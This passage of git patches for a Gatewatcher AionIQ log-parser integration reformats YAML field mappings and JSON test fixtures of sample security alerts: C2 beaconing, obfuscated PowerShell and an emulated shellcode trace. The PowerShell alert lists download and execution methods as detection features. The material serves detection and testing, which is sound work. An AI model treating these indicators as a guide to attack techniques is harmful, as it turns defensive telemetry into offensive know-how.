- gatewatcher.matched_event.file.size: '{{json_load.message.matched_event.file.size}}'
- gatewatcher.matched_event.file.magic: '{{json_load.message.matched_event.file.magic}}'
- gatewatcher.matched_event.file.state: '{{json_load.message.matched_event.file.state}}'
- gatewatcher.matched_event.file.tx_id: '{{json_load.message.matched_event.file.tx_id}}'
- gatewatcher.matched_event.file.stored: '{{json_load.message.matched_event.file.stored}}'
- gatewatcher.matched_event.file.hash.md5: '{{json_load.message.matched_event.file.hash.md5}}'
- gatewatcher.matched_event.file.hash.sha256: '{{json_load.message.matched_event.file.hash.sha256}}'
- filter: ''
- name: set
+ gatewatcher.matched_event.id: "{{json_load.message.matched_event.id}}"
+ gatewatcher.matched_event.file.sid: "{{json_load.message.matched_event.file.sid}}"
+ gatewatcher.matched_event.file.gaps: "{{json_load.message.matched_event.file.gaps}}"
+ gatewatcher.matched_event.file.name: "{{json_load.message.matched_event.file.name}}"
+ gatewatcher.matched_event.file.size: "{{json_load.message.matched_event.file.size}}"
+ gatewatcher.matched_event.file.magic: "{{json_load.message.matched_event.file.magic}}"
+ gatewatcher.matched_event.file.state: "{{json_load.message.matched_event.file.state}}"
+ gatewatcher.matched_event.file.tx_id: "{{json_load.message.matched_event.file.tx_id}}"
+ gatewatcher.matched_event.file.stored: "{{json_load.message.matched_event.file.stored}}"
+ gatewatcher.matched_event.file.hash.md5: "{{json_load.message.matched_event.file.hash.md5}}"
+ gatewatcher.matched_event.file.hash.sha256: "{{json_load.message.matched_event.file.hash.sha256}}"
 ransomware_detect:
 actions:
 - set:
- gatewatcher.ransomware.session_score: '{{json_load.message.ransomware.session_score}}'
- gatewatcher.ransomware.alert_threshold: '{{json_load.message.ransomware.alert_threshold}}'
- 
gatewatcher.ransomware.malicious_behavior_confidence: '{{json_load.message.ransomware.malicious_behavior_confidence}}'
- filter: ''
- name: set
+ gatewatcher.ransomware.session_score: "{{json_load.message.ransomware.session_score}}"
+ gatewatcher.ransomware.alert_threshold: "{{json_load.message.ransomware.alert_threshold}}"
+ gatewatcher.ransomware.malicious_behavior_confidence: "{{json_load.message.ransomware.malicious_behavior_confidence}}"
 dga_detect:
 actions:
 - set:
- gatewatcher.dga.top_DGA: '{{json_load.message.dga.top_DGA}}'
- gatewatcher.dga.dga_count: '{{json_load.message.dga.dga_count}}'
- gatewatcher.dga.dga_ratio: '{{json_load.message.dga.dga_ratio}}'
- gatewatcher.dga.nx_domain_count: '{{json_load.message.dga.nx_domain_count}}'
- gatewatcher.dga.malware_behavior_confidence: '{{json_load.message.dga.malware_behavior_confidence}}'
- filter: ''
- name: set
+ gatewatcher.dga.top_DGA: "{{json_load.message.dga.top_DGA}}"
+ gatewatcher.dga.dga_count: "{{json_load.message.dga.dga_count}}"
+ gatewatcher.dga.dga_ratio: "{{json_load.message.dga.dga_ratio}}"
+ gatewatcher.dga.nx_domain_count: "{{json_load.message.dga.nx_domain_count}}"
+ gatewatcher.dga.malware_behavior_confidence: "{{json_load.message.dga.malware_behavior_confidence}}"
 network_behavior_analytics:
 actions:
 - set:
- gatewatcher.nba.gid: '{{json_load.message.nba.gid}}'
- gatewatcher.nba.rev: '{{json_load.message.nba.rev}}'
- gatewatcher.nba.action: '{{json_load.message.nba.action}}'
- gatewatcher.nba.packet: '{{json_load.message.nba.packet}}'
- gatewatcher.nba.stream: '{{json_load.message.nba.stream}}'
- gatewatcher.nba.payload: '{{json_load.message.nba.payload}}'
- gatewatcher.nba.category: '{{json_load.message.nba.category}}'
- gatewatcher.nba.signature: '{{json_load.message.nba.signature}}'
- gatewatcher.nba.signature_id: '{{json_load.message.nba.signature_id}}'
- gatewatcher.nba.payload_printable: '{{json_load.message.nba.payload_printable}}'
- gatewatcher.nba.metadata.performance_impact: 
'{{json_load.message.nba.metadata.performance_impact}}'
- gatewatcher.nba.metadata.signature_severity: '{{json_load.message.nba.metadata.signature_severity}}'
- filter: ''
- name: set
+ gatewatcher.nba.gid: "{{json_load.message.nba.gid}}"
+ gatewatcher.nba.rev: "{{json_load.message.nba.rev}}"
+ gatewatcher.nba.action: "{{json_load.message.nba.action}}"
+ gatewatcher.nba.packet: "{{json_load.message.nba.packet}}"
+ gatewatcher.nba.stream: "{{json_load.message.nba.stream}}"
+ gatewatcher.nba.payload: "{{json_load.message.nba.payload}}"
+ gatewatcher.nba.category: "{{json_load.message.nba.category}}"
+ gatewatcher.nba.signature: "{{json_load.message.nba.signature}}"
+ gatewatcher.nba.signature_id: "{{json_load.message.nba.signature_id}}"
+ gatewatcher.nba.payload_printable: "{{json_load.message.nba.payload_printable}}"
+ gatewatcher.nba.metadata.performance_impact: "{{json_load.message.nba.metadata.performance_impact}}"
+ gatewatcher.nba.metadata.signature_severity: "{{json_load.message.nba.metadata.signature_severity}}"
 ioc:
 actions:
 - set:
- threat.indicator.marking.tlp: '{{json_load.message.ioc.tlp}}'
- gatewatcher.ioc.tags: '{{json_load.message.ioc.tags}}'
- threat.indicator.type: '{{json_load.message.ioc.type}}'
- threat.indicator.name: '{{json_load.message.ioc.value}}'
- gatewatcher.ioc.case_id: '{{json_load.message.ioc.case_id}}'
- gatewatcher.ioc.families: '{{json_load.message.ioc.families}}'
- gatewatcher.ioc.campaigns: '{{json_load.message.ioc.campaigns}}'
- gatewatcher.ioc.relations: '{{json_load.message.ioc.relations}}'
- gatewatcher.ioc.signature: '{{json_load.message.ioc.signature}}'
- gatewatcher.ioc.categories: '{{json_load.message.ioc.categories}}'
- gatewatcher.ioc.usage_mode: '{{json_load.message.ioc.usage_mode}}'
- gatewatcher.ioc.description: '{{json_load.message.ioc.description}}'
- gatewatcher.ioc.package_date: '{{json_load.message.ioc.package_date}}'
- gatewatcher.ioc.threat_actor: '{{json_load.message.ioc.threat_actor}}'
- 
gatewatcher.ioc.updated_date: '{{json_load.message.ioc.updated_date}}'
- gatewatcher.ioc.creation_date: '{{json_load.message.ioc.creation_date}}'
- gatewatcher.ioc.meta_data.cwe: '{{json_load.message.ioc.meta_data.cwe}}'
- gatewatcher.ioc.external_links: '{{json_load.message.ioc.external_links}}'
- gatewatcher.ioc.targeted_sectors: '{{json_load.message.ioc.targeted_sectors}}'
- gatewatcher.ioc.kill_chain_phases: '{{json_load.message.ioc.kill_chain_phases}}'
- gatewatcher.ioc.targeted_countries: '{{json_load.message.ioc.targeted_countries}}'
- gatewatcher.ioc.targeted_platforms: '{{json_load.message.ioc.targeted_platforms}}'
- gatewatcher.ioc.meta_data.usageMode: '{{json_load.message.ioc.meta_data.usageMode}}'
- gatewatcher.ioc.meta_data.descriptions: '{{json_load.message.ioc.meta_data.descriptions}}'
- gatewatcher.ioc.targeted_organizations: '{{json_load.message.ioc.targeted_organizations}}'
- filter: ''
- name: set
-
+ threat.indicator.marking.tlp: "{{json_load.message.ioc.tlp}}"
+ gatewatcher.ioc.tags: "{{json_load.message.ioc.tags}}"
+ threat.indicator.type: "{{json_load.message.ioc.type}}"
+ threat.indicator.name: "{{json_load.message.ioc.value}}"
+ gatewatcher.ioc.case_id: "{{json_load.message.ioc.case_id}}"
+ gatewatcher.ioc.families: "{{json_load.message.ioc.families}}"
+ gatewatcher.ioc.campaigns: "{{json_load.message.ioc.campaigns}}"
+ gatewatcher.ioc.relations: "{{json_load.message.ioc.relations}}"
+ gatewatcher.ioc.signature: "{{json_load.message.ioc.signature}}"
+ gatewatcher.ioc.categories: "{{json_load.message.ioc.categories}}"
+ gatewatcher.ioc.usage_mode: "{{json_load.message.ioc.usage_mode}}"
+ gatewatcher.ioc.description: "{{json_load.message.ioc.description}}"
+ gatewatcher.ioc.package_date: "{{json_load.message.ioc.package_date}}"
+ gatewatcher.ioc.threat_actor: "{{json_load.message.ioc.threat_actor}}"
+ gatewatcher.ioc.updated_date: "{{json_load.message.ioc.updated_date}}"
+ gatewatcher.ioc.creation_date: 
"{{json_load.message.ioc.creation_date}}" + gatewatcher.ioc.meta_data.cwe: "{{json_load.message.ioc.meta_data.cwe}}" + gatewatcher.ioc.external_links: "{{json_load.message.ioc.external_links}}" + gatewatcher.ioc.targeted_sectors: "{{json_load.message.ioc.targeted_sectors}}" + gatewatcher.ioc.kill_chain_phases: "{{json_load.message.ioc.kill_chain_phases}}" + gatewatcher.ioc.targeted_countries: "{{json_load.message.ioc.targeted_countries}}" + gatewatcher.ioc.targeted_platforms: "{{json_load.message.ioc.targeted_platforms}}" + gatewatcher.ioc.meta_data.usageMode: "{{json_load.message.ioc.meta_data.usageMode}}" + gatewatcher.ioc.meta_data.descriptions: "{{json_load.message.ioc.meta_data.descriptions}}" + gatewatcher.ioc.targeted_organizations: "{{json_load.message.ioc.targeted_organizations}}" From 5398fa328765efce5efd63617d816ecd8f8ba46a Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Tue, 1 Oct 2024 19:19:55 +0200 Subject: [PATCH 098/317] chore(GateWatcher): apply linter --- GateWatcher/aioniq_ecs/tests/beacon_event.json | 4 ++-- .../aioniq_ecs/tests/codebreaker_powershell_alert.json | 4 ++-- GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json | 4 ++-- GateWatcher/aioniq_ecs/tests/dga_event.json | 4 ++-- GateWatcher/aioniq_ecs/tests/history.json | 4 ++-- GateWatcher/aioniq_ecs/tests/ioc.json | 4 ++-- GateWatcher/aioniq_ecs/tests/malcore_event.json | 4 ++-- GateWatcher/aioniq_ecs/tests/metadata.json | 4 ++-- GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json | 4 ++-- GateWatcher/aioniq_ecs/tests/nba.json | 4 ++-- GateWatcher/aioniq_ecs/tests/ransomware.json | 4 ++-- GateWatcher/aioniq_ecs/tests/retrohunt.json | 4 ++-- GateWatcher/aioniq_ecs/tests/sigflow_alert.json | 4 ++-- GateWatcher/aioniq_ecs/tests/sigflow_stats.json | 4 ++-- 14 files changed, 28 insertions(+), 28 deletions(-) diff --git a/GateWatcher/aioniq_ecs/tests/beacon_event.json b/GateWatcher/aioniq_ecs/tests/beacon_event.json index 3626c4db0..228c38f0c 100644 
--- a/GateWatcher/aioniq_ecs/tests/beacon_event.json
+++ b/GateWatcher/aioniq_ecs/tests/beacon_event.json
@@ -1,12 +1,12 @@ { "input": { + "message": "{\n \"tls\": {\n \"client\": {\n \"server_name\": \"cisco-update.com\"\n }\n },\n \"@version\": \"1\",\n \"event\": {\n \"created\": \"2024-09-09T13:02:34.254441+00:00\",\n \"end\": \"2024-09-09T11:52:25.666000+00:00\",\n \"severity\": 3,\n \"module\": \"beacon_detect\",\n \"start\": \"2024-09-09T11:47:44.012000+00:00\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"kind\": \"alert\",\n \"id\": \"5e7bb104-6493-43b2-be4d-f7c28ce79e85\",\n \"dataset\": \"alert\"\n },\n \"source\": {\n \"ip\": \"10.0.0.60\",\n \"mac\": \"60:57:18:e9:4f:5d\"\n },\n \"beacon\": {\n \"mean_time_interval\": 1,\n \"active\": true,\n \"possible_cnc\": \"not_recognized\",\n \"session_count\": 260,\n \"type\": \"constant\",\n \"id\": \"c4c886b4ad\",\n \"hostname_resolution\": \"not_analyzed\"\n },\n \"destination\": {\n \"ip\": \"157.230.93.100\",\n \"port\": 443\n },\n \"observer\": {\n \"product\": \"gcenter\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"gcap\": {\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"vendor\": \"gatewatcher\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"@timestamp\": \"2024-09-09T13:02:59.354490664Z\",\n \"url\": {\n \"domain\": \"cisco-update.com\"\n },\n \"network\": {\n \"protocol\": \"tls\",\n \"timestamp\": \"2024-09-09T11:47:44.012000+00:00\",\n \"transport\": \"tcp\"\n }\n}", "sekoiaio": { "intake": { "dialect": "Gatewatcher AionIQ V103", "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" } - }, - "message": "{\n \"tls\": {\n \"client\": {\n \"server_name\": \"cisco-update.com\"\n }\n },\n \"@version\": \"1\",\n \"event\": {\n \"created\": \"2024-09-09T13:02:34.254441+00:00\",\n \"end\": \"2024-09-09T11:52:25.666000+00:00\",\n \"severity\": 3,\n \"module\": \"beacon_detect\",\n \"start\": 
\"2024-09-09T11:47:44.012000+00:00\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"kind\": \"alert\",\n \"id\": \"5e7bb104-6493-43b2-be4d-f7c28ce79e85\",\n \"dataset\": \"alert\"\n },\n \"source\": {\n \"ip\": \"10.0.0.60\",\n \"mac\": \"60:57:18:e9:4f:5d\"\n },\n \"beacon\": {\n \"mean_time_interval\": 1,\n \"active\": true,\n \"possible_cnc\": \"not_recognized\",\n \"session_count\": 260,\n \"type\": \"constant\",\n \"id\": \"c4c886b4ad\",\n \"hostname_resolution\": \"not_analyzed\"\n },\n \"destination\": {\n \"ip\": \"157.230.93.100\",\n \"port\": 443\n },\n \"observer\": {\n \"product\": \"gcenter\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"gcap\": {\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"vendor\": \"gatewatcher\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"@timestamp\": \"2024-09-09T13:02:59.354490664Z\",\n \"url\": {\n \"domain\": \"cisco-update.com\"\n },\n \"network\": {\n \"protocol\": \"tls\",\n \"timestamp\": \"2024-09-09T11:47:44.012000+00:00\",\n \"transport\": \"tcp\"\n }\n}" + } }, "expected": { "message": "{\n \"tls\": {\n \"client\": {\n \"server_name\": \"cisco-update.com\"\n }\n },\n \"@version\": \"1\",\n \"event\": {\n \"created\": \"2024-09-09T13:02:34.254441+00:00\",\n \"end\": \"2024-09-09T11:52:25.666000+00:00\",\n \"severity\": 3,\n \"module\": \"beacon_detect\",\n \"start\": \"2024-09-09T11:47:44.012000+00:00\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"kind\": \"alert\",\n \"id\": \"5e7bb104-6493-43b2-be4d-f7c28ce79e85\",\n \"dataset\": \"alert\"\n },\n \"source\": {\n \"ip\": \"10.0.0.60\",\n \"mac\": \"60:57:18:e9:4f:5d\"\n },\n \"beacon\": {\n \"mean_time_interval\": 1,\n \"active\": true,\n \"possible_cnc\": \"not_recognized\",\n \"session_count\": 260,\n \"type\": \"constant\",\n \"id\": 
\"c4c886b4ad\",\n \"hostname_resolution\": \"not_analyzed\"\n },\n \"destination\": {\n \"ip\": \"157.230.93.100\",\n \"port\": 443\n },\n \"observer\": {\n \"product\": \"gcenter\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"gcap\": {\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"vendor\": \"gatewatcher\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"@timestamp\": \"2024-09-09T13:02:59.354490664Z\",\n \"url\": {\n \"domain\": \"cisco-update.com\"\n },\n \"network\": {\n \"protocol\": \"tls\",\n \"timestamp\": \"2024-09-09T11:47:44.012000+00:00\",\n \"transport\": \"tcp\"\n }\n}",
diff --git a/GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json b/GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json
index d6d87aeb8..5d691dec4 100644
--- a/GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json
+++ b/GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json
@@ -1,12 +1,12 @@ { "input": { + "message": "{\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"network\": {\n \"protocol\": \"unknown\",\n \"transport\": \"tcp\",\n \"timestamp\": \"2024-09-11T09:10:46.975548+0000\",\n \"flow_id\": 779924698221176\n },\n \"source\": {\n \"port\": 35444,\n \"ip\": \"10.127.0.111\"\n },\n \"destination\": {\n \"port\": 4242,\n \"ip\": \"10.127.0.222\"\n },\n \"malicious_powershell\": {\n \"proba_obfuscated\": 1,\n \"score\": 1890,\n \"sample_id\": \"09-11-2024T09:11:49_5a4a9ad809c84969b7f2bac324e41554_gcap-clement-l.gatewatcher.fr\",\n \"id\": \"60b656e17bec0a97f5638790c78a3124\",\n \"score_details\": {\n \"StrReplace\": 0,\n \"StreamReader\": 0,\n \"StartBitsTransfer\": 0,\n \"InvokeRestMethod\": 0,\n \"Base64\": 1520,\n \"StreamWriter\": 0,\n \"InvokeExpression\": 0,\n \"SystemIOFile\": 0,\n \"StrJoin\": 0,\n \"StrCat\": 370,\n \"WebClientInvokation\": 0,\n \"GetContent\": 0,\n \"FmtStr\": 0,\n \"CharInt\": 0,\n \"InvokeWebRequest\": 0,\n \"AddContent\": 0,\n \"SetContent\": 0\n }\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"@timestamp\": \"2024-09-11T09:11:52.737102768Z\",\n \"@version\": \"1\",\n \"event\": {\n \"id\": \"de7b5e80-a4b2-4ed6-b566-3590945e34d5\",\n \"kind\": \"alert\",\n \"module\": \"malicious_powershell_detect\",\n \"severity\": 1,\n \"dataset\": \"alert\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"created\": \"2024-09-11T09:11:52.735668+0000\"\n }\n}", "sekoiaio": { "intake": { "dialect": "Gatewatcher AionIQ V103", "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" } - }, - "message": "{\n 
\"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"network\": {\n \"protocol\": \"unknown\",\n \"transport\": \"tcp\",\n \"timestamp\": \"2024-09-11T09:10:46.975548+0000\",\n \"flow_id\": 779924698221176\n },\n \"source\": {\n \"port\": 35444,\n \"ip\": \"10.127.0.111\"\n },\n \"destination\": {\n \"port\": 4242,\n \"ip\": \"10.127.0.222\"\n },\n \"malicious_powershell\": {\n \"proba_obfuscated\": 1,\n \"score\": 1890,\n \"sample_id\": \"09-11-2024T09:11:49_5a4a9ad809c84969b7f2bac324e41554_gcap-clement-l.gatewatcher.fr\",\n \"id\": \"60b656e17bec0a97f5638790c78a3124\",\n \"score_details\": {\n \"StrReplace\": 0,\n \"StreamReader\": 0,\n \"StartBitsTransfer\": 0,\n \"InvokeRestMethod\": 0,\n \"Base64\": 1520,\n \"StreamWriter\": 0,\n \"InvokeExpression\": 0,\n \"SystemIOFile\": 0,\n \"StrJoin\": 0,\n \"StrCat\": 370,\n \"WebClientInvokation\": 0,\n \"GetContent\": 0,\n \"FmtStr\": 0,\n \"CharInt\": 0,\n \"InvokeWebRequest\": 0,\n \"AddContent\": 0,\n \"SetContent\": 0\n }\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"@timestamp\": \"2024-09-11T09:11:52.737102768Z\",\n \"@version\": \"1\",\n \"event\": {\n \"id\": \"de7b5e80-a4b2-4ed6-b566-3590945e34d5\",\n \"kind\": \"alert\",\n \"module\": \"malicious_powershell_detect\",\n \"severity\": 1,\n \"dataset\": \"alert\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"created\": \"2024-09-11T09:11:52.735668+0000\"\n }\n}" + } }, "expected": { "message": "{\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": 
\"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"network\": {\n \"protocol\": \"unknown\",\n \"transport\": \"tcp\",\n \"timestamp\": \"2024-09-11T09:10:46.975548+0000\",\n \"flow_id\": 779924698221176\n },\n \"source\": {\n \"port\": 35444,\n \"ip\": \"10.127.0.111\"\n },\n \"destination\": {\n \"port\": 4242,\n \"ip\": \"10.127.0.222\"\n },\n \"malicious_powershell\": {\n \"proba_obfuscated\": 1,\n \"score\": 1890,\n \"sample_id\": \"09-11-2024T09:11:49_5a4a9ad809c84969b7f2bac324e41554_gcap-clement-l.gatewatcher.fr\",\n \"id\": \"60b656e17bec0a97f5638790c78a3124\",\n \"score_details\": {\n \"StrReplace\": 0,\n \"StreamReader\": 0,\n \"StartBitsTransfer\": 0,\n \"InvokeRestMethod\": 0,\n \"Base64\": 1520,\n \"StreamWriter\": 0,\n \"InvokeExpression\": 0,\n \"SystemIOFile\": 0,\n \"StrJoin\": 0,\n \"StrCat\": 370,\n \"WebClientInvokation\": 0,\n \"GetContent\": 0,\n \"FmtStr\": 0,\n \"CharInt\": 0,\n \"InvokeWebRequest\": 0,\n \"AddContent\": 0,\n \"SetContent\": 0\n }\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"@timestamp\": \"2024-09-11T09:11:52.737102768Z\",\n \"@version\": \"1\",\n \"event\": {\n \"id\": \"de7b5e80-a4b2-4ed6-b566-3590945e34d5\",\n \"kind\": \"alert\",\n \"module\": \"malicious_powershell_detect\",\n \"severity\": 1,\n \"dataset\": \"alert\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"created\": \"2024-09-11T09:11:52.735668+0000\"\n }\n}",
diff --git a/GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json b/GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json
index 048d8d91d..1ee17a006 100644
--- a/GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json
+++ b/GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json
@@ -1,12 +1,12 @@ { "input": { + "message": "{\n \"network\": {\n \"protocol\": \"unknown\",\n \"timestamp\": \"2024-09-11T15:35:30.167846+0000\",\n \"transport\": \"tcp\",\n \"flow_id\": 888739207482646\n },\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"destination\": {\n \"port\": 6666,\n \"ip\": \"178.160.128.2\"\n },\n \"source\": {\n \"port\": 60078,\n \"ip\": \"80.15.17.183\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"shellcode\": {\n \"sub_type\": \"Windows_x86_32\",\n \"encodings\": [\n {\n \"name\": \"Bloxor\",\n \"count\": 4\n }\n ],\n \"sample_id\": \"09-11-2024T15:36:31_8608eb20e6844d2786d36811f92a673b_gcap-clement-l.gatewatcher.fr\",\n \"analysis\": [\n {\n \"call\": \"kernel32_LoadLibraryA\",\n \"args\": \"{lpFileName: user32.dll}\",\n \"_id\": 0,\n \"ret\": \"0x70600000\"\n },\n {\n \"call\": \"user32_MessageBoxA\",\n \"args\": \"{hWnd: None, lpText: Do you like GateWatcher ?, lpCaption: Gatewatcher2018, uType: [MB_OK, MB_ICONQUESTION, MB_DEFBUTTON1, MB_APPLMODAL, None]}\",\n \"_id\": 1,\n \"ret\": \"1\"\n },\n {\n \"call\": \"kernel32_ExitProcess\",\n \"args\": \"{uExitCode: 0}\",\n \"_id\": 2,\n \"ret\": \"0\"\n },\n {\n \"info\": \"Stop : End of shellcode (Exit)\",\n \"_id\": -1\n }\n ],\n \"id\": \"790a2aa742e1da23e14c9b7270ee81a1\"\n },\n \"@timestamp\": \"2024-09-11T15:36:36.071882055Z\",\n \"@version\": \"1\",\n \"event\": {\n \"dataset\": \"alert\",\n \"kind\": \"alert\",\n \"module\": \"shellcode_detect\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"severity\": 1,\n \"id\": \"8c03d100-794f-45fe-8d92-7409c925b255\",\n \"created\": 
\"2024-09-11T15:36:36.068564+0000\"\n }\n}", "sekoiaio": { "intake": { "dialect": "Gatewatcher AionIQ V103", "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" } - }, - "message": "{\n \"network\": {\n \"protocol\": \"unknown\",\n \"timestamp\": \"2024-09-11T15:35:30.167846+0000\",\n \"transport\": \"tcp\",\n \"flow_id\": 888739207482646\n },\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"destination\": {\n \"port\": 6666,\n \"ip\": \"178.160.128.2\"\n },\n \"source\": {\n \"port\": 60078,\n \"ip\": \"80.15.17.183\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"shellcode\": {\n \"sub_type\": \"Windows_x86_32\",\n \"encodings\": [\n {\n \"name\": \"Bloxor\",\n \"count\": 4\n }\n ],\n \"sample_id\": \"09-11-2024T15:36:31_8608eb20e6844d2786d36811f92a673b_gcap-clement-l.gatewatcher.fr\",\n \"analysis\": [\n {\n \"call\": \"kernel32_LoadLibraryA\",\n \"args\": \"{lpFileName: user32.dll}\",\n \"_id\": 0,\n \"ret\": \"0x70600000\"\n },\n {\n \"call\": \"user32_MessageBoxA\",\n \"args\": \"{hWnd: None, lpText: Do you like GateWatcher ?, lpCaption: Gatewatcher2018, uType: [MB_OK, MB_ICONQUESTION, MB_DEFBUTTON1, MB_APPLMODAL, None]}\",\n \"_id\": 1,\n \"ret\": \"1\"\n },\n {\n \"call\": \"kernel32_ExitProcess\",\n \"args\": \"{uExitCode: 0}\",\n \"_id\": 2,\n \"ret\": \"0\"\n },\n {\n \"info\": \"Stop : End of shellcode (Exit)\",\n \"_id\": -1\n }\n ],\n \"id\": \"790a2aa742e1da23e14c9b7270ee81a1\"\n },\n \"@timestamp\": \"2024-09-11T15:36:36.071882055Z\",\n \"@version\": \"1\",\n \"event\": {\n \"dataset\": \"alert\",\n \"kind\": \"alert\",\n \"module\": \"shellcode_detect\",\n 
\"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"severity\": 1,\n \"id\": \"8c03d100-794f-45fe-8d92-7409c925b255\",\n \"created\": \"2024-09-11T15:36:36.068564+0000\"\n }\n}" + } }, "expected": { "message": "{\n \"network\": {\n \"protocol\": \"unknown\",\n \"timestamp\": \"2024-09-11T15:35:30.167846+0000\",\n \"transport\": \"tcp\",\n \"flow_id\": 888739207482646\n },\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"destination\": {\n \"port\": 6666,\n \"ip\": \"178.160.128.2\"\n },\n \"source\": {\n \"port\": 60078,\n \"ip\": \"80.15.17.183\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"shellcode\": {\n \"sub_type\": \"Windows_x86_32\",\n \"encodings\": [\n {\n \"name\": \"Bloxor\",\n \"count\": 4\n }\n ],\n \"sample_id\": \"09-11-2024T15:36:31_8608eb20e6844d2786d36811f92a673b_gcap-clement-l.gatewatcher.fr\",\n \"analysis\": [\n {\n \"call\": \"kernel32_LoadLibraryA\",\n \"args\": \"{lpFileName: user32.dll}\",\n \"_id\": 0,\n \"ret\": \"0x70600000\"\n },\n {\n \"call\": \"user32_MessageBoxA\",\n \"args\": \"{hWnd: None, lpText: Do 